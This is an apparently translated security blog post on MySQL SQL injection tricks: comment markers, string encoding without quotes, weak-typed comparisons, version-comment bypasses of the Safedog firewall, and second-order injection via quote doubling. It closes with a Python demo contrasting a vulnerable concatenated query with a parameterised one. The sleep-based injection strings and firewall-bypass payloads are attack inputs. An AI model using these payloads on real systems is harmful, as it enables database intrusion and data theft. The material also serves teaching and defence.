SQL injection: easily overlooked syntax tricks, and second-order injection
Things that are easily overlooked and easily gotten wrong
SQL injection tricks
=========================================================================

* If single quotes are escaped and the current database uses the GBK character set, consider a double-byte injection.

* Correct use of comment markers

  `-- ` (with a trailing space) is the MySQL comment marker; note the space after the dashes.

  ```
  mysql> select user() from (select 1)x where '1'='1';-- '
  +----------------+
  | user()         |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)
  ```

  With the `#` comment marker it does not matter whether a space follows.

  ```
  mysql> select user() from (select 1) x where '1'='1';#'
  +----------------+
  | user()         |
  +----------------+
  | root@localhost |
  +----------------+
  1 row in set (0.00 sec)
  ```

* Using `/**/` in place of spaces

  ```
  mysql> select/**/1;
  +---+
  | 1 |
  +---+
  | 1 |
  +---+
  1 row in set (0.00 sec)
  ```

* Encoding strings in SQL statements (producing a string value without writing quote characters)

  - `char()` with a list of code points:

    ```
    mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );
    +-------------------------------------------------------------------+
    | char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |
    +-------------------------------------------------------------------+
    |  /tmp/f_user.txt                                                  |
    +-------------------------------------------------------------------+
    1 row in set (0.00 sec)
    ```

  - `concat()` of single-character `char()` calls:

    ```
    mysql> select concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |  /tmp/f_user.txt                                                                                                                                                    |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)
    ```

  - UTF-8 bytes via `unhex()`:

    ```
    mysql> select unhex('E6B8B8E5AEA2');
    +-----------------------+
    | unhex('E6B8B8E5AEA2') |
    +-----------------------+
    | 游客                  |
    +-----------------------+
    1 row in set (0.00 sec)
    ```

* Comparing numbers with strings behaves like PHP's weak typing: a string is converted to a number using its leading digits.

  ```
  mysql> select '10asfasfdeasdfasdf'=10;
  +-------------------------+
  | '10asfasfdeasdfasdf'=10 |
  +-------------------------+
  |                       1 |
  +-------------------------+
  ```

  ```
  mysql> select '0esfsadf'=0;
  +--------------+
  | '0esfsadf'=0 |
  +--------------+
  |            1 |
  +--------------+
  ```

* Bypassing Safedog (安全狗)

  - Regex bypass, using MySQL version-conditional comments:

    ```
    select 1/*!50000union/*!*//*!50000select/*!*/2;
    +---+
    | 1 |
    +---+
    | 1 |
    | 2 |
    +---+
    ```

    ```
    mysql> select/*/#\*/1;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)
    ```

* When several single quotes run together, the outermost two lone single quotes pair up as the string delimiters, and the even number of consecutive single quotes in between are taken in pairs, each pair yielding one literal quote.

  ```
  mysql> select '123''';
  +------+
  | 123' |
  +------+
  | 123' |
  +------+
  1 row in set (0.00 sec)
  ```

  ```
  mysql> select '123''''';
  +-------+
  | 123'' |
  +-------+
  | 123'' |
  +-------+
  ```

  ```
  mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'
  Empty set (1.00 sec)
  ```

  This property can give rise to "second-order injection". For example, when a user registers with the nickname `{nickname'}`, the input is escaped to `{nickname\'}`, but after the INSERT the value stored in the database is the original `{nickname'}`. Any page that later uses that nickname as a query condition is then open to second-order injection: the trailing quote of the nickname pairs with the opening quote of the next condition, and giving the other condition field the value `{ or 0=sleep(1);#}` is enough to trigger it.
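The flow just described, as an added example that is not part of the original post: a constructed in-memory SQLite database stands in for MySQL, the nickname is escaped on registration by doubling the quote (an assumption, since SQLite has no backslash escapes; the effect of storing the original value is the same as in the post), and the stored nickname is then reused in a concatenated query beside the parameterised query that is not affected.

```python
import sqlite3


def escape_literal(value):
    # Standard SQL escaping: double each single quote (MySQL accepts this form too).
    return value.replace("'", "''")


def new_db():
    # Constructed sample data; in-memory SQLite stands in for the MySQL server.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(user TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'hunter2');
        INSERT INTO users VALUES ('guest', 'guest');
    """)
    return conn


def register(conn, nickname, password):
    # Input is escaped at registration, so the INSERT parses correctly. The parser
    # consumes the doubling, and the stored value is the original nickname, quote included.
    sql = "INSERT INTO users VALUES ('%s', '%s')" % (escape_literal(nickname), escape_literal(password))
    conn.execute(sql)


def find_users_vulnerable(conn, nickname, password):
    # Second-order flaw: the nickname was read back from the database, is trusted as
    # "already escaped", and is concatenated unescaped into a new statement.
    sql = "SELECT user FROM users WHERE user='%s' AND password='%s'" % (nickname, password)
    return [row[0] for row in conn.execute(sql)]


def find_users_safe(conn, nickname, password):
    # Parameterised query: stored data is bound as a value and never parsed as SQL.
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    return [row[0] for row in conn.execute(sql, (nickname, password))]


def demo():
    conn = new_db()
    register(conn, "nickname'", "pw")
    # Later page: the nickname comes from the database, not from the request.
    nick = conn.execute("SELECT user FROM users WHERE password='pw'").fetchone()[0]
    # The nickname's trailing quote pairs with the opening quote of the password literal,
    # so "' AND password='" is swallowed into one string and the rest is parsed as SQL.
    # A benign tautology replaces the post's sleep() so the effect is visible in the result.
    second_field = " OR 1=1 -- "
    return {
        "stored": nick,
        "vulnerable": find_users_vulnerable(conn, nick, second_field),
        "safe": find_users_safe(conn, nick, second_field),
    }
```

The vulnerable query returns every row because the WHERE clause collapses to `user='...' OR 1=1`, while the parameterised version returns nothing, since no user has that literal password.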
Heaven helps those who help themselves; blessed by Heaven, all is auspicious and nothing is unfavourable.